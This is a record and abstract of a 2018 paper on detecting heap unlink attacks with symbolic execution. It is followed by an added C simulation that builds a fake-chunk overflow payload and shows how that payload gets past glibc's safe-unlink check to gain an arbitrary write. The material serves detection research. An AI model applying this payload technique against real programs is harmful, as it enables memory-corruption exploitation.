Detection of Unlink Attack Based on Symbolic Execution

Cited by: 0
Authors
Huang N. [1 ]
Huang S. [1 ]
Liang Z. [2 ]
Affiliations
[1] Electronic Engineering Institute, National University of Defense Technology, Hefei, 230037, Anhui
[2] School of Automation Science and Engineering, South China University of Technology, Guangzhou, 510640, Guangdong
Keywords
Buffer overflow; Heap-based overflow; Symbolic execution; Taint analysis; Unlink attack;
DOI
10.3969/j.issn.1000-565X.2018.08.012
Abstract
An unlink attack exploits a heap-based overflow vulnerability in Linux. Existing buffer-overflow testing techniques locate a program's trigger point by checking the state of its control flow and then generate test cases. However, because overflowed heap data rarely lead directly to control-flow hijacking, and because of the limits imposed by the relevant protection mechanisms, these techniques struggle to determine whether a program satisfies the conditions for a heap-overflow exploit. To improve software security and make unlink attacks detectable, this paper summarizes the features of the unlink attack from an analysis of attack instances, establishes a detection model for it, and proposes a detection method based on that model. The method uses taint analysis to monitor the program's input data and sensitive operations, uses symbolic execution to build the path constraints on tainted data together with the data constraints of the unlink attack, determines whether the program satisfies the triggering conditions of an unlink attack, and generates test cases by solving those constraints. Experimental results show that the method detects unlink attacks effectively. © 2018, Editorial Department, Journal of South China University of Technology. All rights reserved.
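The detection model described in the abstract rests on two things: what the glibc unlink primitive does with a chunk's fd/bk links, and the data constraints an overflow must satisfy for free() to reach that primitive with attacker-controlled links. The following is an added example, not code from the paper: it models the 64-bit glibc malloc_chunk layout and the safe-unlink check on a static array that stands in for the heap, builds the overflow payload an unlink attack needs, and evaluates the triggering conditions concretely (the paper builds the same predicates symbolically over tainted bytes and solves them). The names sim_heap, g_ptr, build_payload, simulate_free_b and unlink_attack_feasible are this example's own, and the taint flags are assumed inputs standing in for a detector's taint labels.

```c
/* Added example, not from the paper: a model of the glibc unlink primitive
 * and of the data constraints an unlink attack must satisfy, checked
 * concretely against an attacker-built fake chunk. All memory is a static
 * array standing in for the heap; nothing here touches the real allocator.
 * Chunk layout follows 64-bit glibc malloc_chunk (prev_size, size, fd, bk);
 * sim_heap, g_ptr and the function names are this example's own. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PREV_INUSE 0x1UL
#define SIZE_BITS  0x7UL

struct chunk {
    size_t prev_size;       /* size of the previous chunk, valid only if PREV_INUSE is clear */
    size_t size;            /* chunk size, flag bits in the low 3 bits */
    struct chunk *fd, *bk;  /* free-list links; overlap the user data while allocated */
};

static size_t chunksize(const struct chunk *p) { return p->size & ~SIZE_BITS; }
static bool prev_inuse(const struct chunk *p) { return (p->size & PREV_INUSE) != 0; }
static struct chunk *prev_chunk(const struct chunk *p) {
    return (struct chunk *)((uint8_t *)p - p->prev_size);
}

/* Unlink with the "safe unlinking" check glibc added in 2.3.4. Returns false
 * where glibc would abort with "corrupted double-linked list". */
static bool unlink_chunk(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p) return false;
    fd->bk = bk;  /* these two stores are the attacker's write primitive */
    bk->fd = fd;
    return true;
}

/* The unlink-attack data constraints for free(next), evaluated on concrete
 * bytes. A symbolic-execution detector would build the same predicates over
 * tainted input bytes and solve them; fd_tainted/bk_tainted are assumed
 * inputs standing in for the taint labels such a detector carries. */
static bool unlink_attack_feasible(const struct chunk *next, bool fd_tainted, bool bk_tainted) {
    if (prev_inuse(next)) return false;                 /* no backward consolidation */
    if (!(fd_tainted && bk_tainted)) return false;      /* links not attacker-controlled */
    const struct chunk *p = prev_chunk(next);
    if (chunksize(p) != next->prev_size) return false;  /* glibc >= 2.26 size vs. prev_size check */
    return p->fd->bk == p && p->bk->fd == p;            /* safe-unlink check must pass */
}

/* Simulated heap: chunk A of 0x420 bytes followed by chunk B. Sizes sit above
 * the 64-bit glibc fastbin and tcache limits so free(B) takes the consolidation
 * path. g_ptr is the global holding malloc()'s result for A, i.e. the pointer
 * the victim program later writes through; it is also the attacker's target. */
static _Alignas(16) uint8_t sim_heap[0x900];
static struct chunk *g_ptr;

static struct chunk *chunk_b(void) { return (struct chunk *)(sim_heap + 0x420); }

/* Build the overflow payload: a fake free chunk P at the start of A's user data
 * whose fd/bk point just before g_ptr (so the safe-unlink check passes), plus an
 * overwrite of B's header so that free(B) consolidates backward into P. */
static struct chunk *build_payload(void) {
    struct chunk *a = (struct chunk *)sim_heap, *b = chunk_b();
    memset(sim_heap, 0, sizeof sim_heap);
    a->size = 0x420 | PREV_INUSE;
    g_ptr = (struct chunk *)(sim_heap + 2 * sizeof(size_t));   /* user pointer into A */

    struct chunk *p = g_ptr;                                   /* fake chunk P */
    p->size = 0x410;                                           /* P..B distance, PREV_INUSE clear */
    p->fd = (struct chunk *)((uint8_t *)&g_ptr - offsetof(struct chunk, bk)); /* fd->bk is g_ptr */
    p->bk = (struct chunk *)((uint8_t *)&g_ptr - offsetof(struct chunk, fd)); /* bk->fd is g_ptr */

    b->prev_size = 0x410;  /* overflowed: B - 0x410 == P */
    b->size = 0x420;       /* overflowed: PREV_INUSE clear, "previous chunk is free" */
    return p;
}

/* What free(B) does with that header: consolidate backward and unlink P.
 * Returns the value left in g_ptr, or NULL if the unlink check refused. */
static struct chunk *simulate_free_b(void) {
    struct chunk *b = chunk_b();
    if (prev_inuse(b)) return NULL;
    if (!unlink_chunk(prev_chunk(b))) return NULL;
    return g_ptr;  /* now 24 bytes before itself: the next write through it rewrites g_ptr */
}

int main(void) {
    struct chunk *p = build_payload();
    printf("unlink attack feasible: %d\n", unlink_attack_feasible(chunk_b(), true, true));
    struct chunk *planted = simulate_free_b();
    printf("g_ptr moved from %p to %p (P->fd was %p)\n", (void *)p, (void *)planted, (void *)p->fd);
    return 0;
}
```

The point a detector has to capture is that, with safe unlinking, the attacker can no longer pick fd and bk freely: both must reference a location that already holds a pointer to P, which is why the payload aims fd and bk just before g_ptr. After the unlink, g_ptr points 24 bytes before its own address, so the program's next write through it overwrites g_ptr and the attacker gains an arbitrary write. The feasibility check above is the concrete form of the data constraints the paper's model hands to the solver; removing taint from either link, setting PREV_INUSE on B, or breaking the fd->bk == P consistency each makes it report infeasible.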
Pages: 81-87
Page count: 6